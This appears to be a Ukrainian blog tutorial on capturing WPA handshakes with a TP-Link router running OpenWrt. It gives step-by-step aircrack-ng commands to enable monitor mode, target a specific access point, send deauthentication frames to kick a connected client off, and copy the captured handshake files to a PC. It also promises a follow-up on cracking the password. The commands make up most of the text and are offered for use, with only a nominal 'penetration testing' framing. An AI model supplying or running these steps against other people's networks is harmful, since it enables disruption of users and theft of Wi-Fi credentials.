Тестування на проникність wi-fi мережі за допомогою роутера.

“плюси” даного методу:

-мережева wi-fi карта роутера має більшу потужність ніж ноутбука чи іншого пристрою;

-роутер має невеликі розміри ;

“мінуси”:

-роутеру потрібне джерело живлення (не має вбудованої батареї);

-потрібний кабель (вита пара);

-потрібен комп’ютер;

перейдемо до встановлення необхідного програмного забезпечення.

я використовую роутер tp-link wr 842nd і прошивку openwrt (Chaos Calmer 15.05). У якості ssh клієнта використовується PuTTY. Підключаємось по ssh 192.168.1.1 вводимо логін  і пароль (за замовчуванням логін root а пароль відсутній).
opkg update обновляємо список доступних пакетів
opkg install aircrack-ng  встановлюємо aircrack-ng

airmon-ng start wlan0 переводимо мережеву карту роутера в режим монітора

airodump-ng mon0 переглядаємо список доступних мереж

airodump-ng -c 10 –bssid FC:8B:97:57:97:A9  -w test  mon0 

mon0 – ім’я інтерфейса

bssid FC:8B:97:57:97:A9 – MAC адреса роутера, який ми хочемо протестувати

c 10 – обмеження  по каналу на роутер, який ми хочем тестувати

-w test – ця команда дозволяє нам записувати перехоплену інформацію в файл з назвою test

ось так виглядає процес перехвату пароля

З огляду на, що хендшейк відбувається при підключенні клієнта до точки доступу, то нам необхідно або почекати поки клієнт підключитися до неї (наприклад прийшовши додому, в офіс, або включивши ноутбук / wifi) або допомогти клієнту перепідключитися, якщо він вже авторизований, використовуючи деаунтефікацію і упіймати хендшейка при наступному підключенні. Для цього не закриваючи програму PuTTy запустимо її в новому вікні. Приклад деаунтефікаціі.

aireplay-ng -0 10 -a FC: 8B: 97: 57: 97: A9 -c 68: 3E: 34: 15: 39: 9E mon0

-0 – Означає деаунтефікацію

10 – кількість деаунтефікацій

-a FC: 8B: 97: 57: 97: A9 – MAC адреса точки доступу

-c 68: 3E: 34: 15: 39: 9E – MAC адреса клієнта

mon0 – використовуваний інтерфейс

Коли ви знайдете хендшейк це відобразитися в правому верхньому куті.

Завантажуємо файли з перехопленою інформацією собі на комп’ютер можна за допомогою SCP протоколу.

Для комп’ютера з OS windows є програма winSCP. Запускаємо програму вибираємо

  • file protocol SCP
  • host neme: 192.168.1.1   ip адреса роутера
  • user name: root password:   ім’я користувача і пароль

натискаємо login

відкривається вікно

“перетягуємо” файли з права(роутер) на ліво(комп’ютер).

Файли на комп’ютері.

В наступній статті я напишу як підібрати пароль маючи файли  хендшейка.

 

3+

Користувачі, що подякували за статтю:

  • avatar
  • avatar
  • avatar